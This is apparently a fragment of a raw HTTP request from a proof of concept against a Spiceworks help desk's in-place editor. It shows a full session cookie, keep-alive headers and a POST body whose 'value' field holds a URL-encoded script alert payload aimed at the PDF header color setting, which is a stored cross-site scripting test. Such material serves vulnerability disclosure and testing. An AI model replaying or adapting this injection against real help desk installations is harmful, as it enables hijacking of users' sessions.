spiceworks_session=BAh7FToPc2Vzc2lvbl9pZCIlNzgzNzc2ZGNiNTg1ZWQ1ODRlMDVmN2QyNmIwMzc5NWU6EF9jc3JmX3Rva2VuSSIxRkJGMC8vQ2VkYmRzNUtPV05PM2lrK0FQeVAyb25zcHg4WTNPOUdOWU1sWT0GOgZFRkkiCmZsYXNoBjsHRklDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgx1c2VyX2lkaQY6FHVzZXJfZmlyc3RfbmFtZUkiCXVzZXIGOwdUOhN1c2VyX2xhc3RfbmFtZUkiCGZhcgY7B1Q6D3VzZXJfZW1haWxJIhV1c2VyMTk4N0BnbXguY29tBjsHVDoWdXNlcl9jb21wYW55X25hbWVJIg10ZXN0Y29tcAY7B1Q6DnVzZXJfcm9sZUkiCmFkbWluBjsHVDoPY3JlYXRlZF9hdEl1OglUaW1lDYeRHICWg2JpBjoLb2Zmc2V0aQIwKjoNcmVtZW1iZXJGOhhsYXN0X2ZlYXR1cmVfdXBkYXRlSXU7EQ2HkRyAfodiaQY7EmkCMCo6FmZlYXR1cmVfdXNhZ2VfbWFwexlpBlRpCEZpCUZpEEZpE1RpFVRpFlRpGEZpGUZpGkZpG0ZpCkZpC0ZpDEZpD0ZpF0ZpHEZpHUZpDVRpElQ6H3VzZWRfZmVhdHVyZV9lZHVjYXRpb25faWRzWwA6FnBvcnRhbF91c2VyX2VtYWlsQA06HWxhc3Rfc2V0dGluZ3NfY29udHJvbGxlckkiDWFkdmFuY2VkBjsHRg%3D%3D--64198aa54c349fff2e6e7db88fe63d864cec55fe; compatibility_test=testing; __utmc=1; last_view=open_tickets; tickets_per_page=25 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + +_pickaxe=%E2%B8%95&value=%3Cscript%3Ealert(%22pdf001%22)%3C%2Fscript%3E&editorId=pdf_header_color_inplace&authenticity_token=FBF0%2F%2FCedbds5KOWNO3ik%2BAPyP2onspx8Y3O9GNYMlY%3D + + +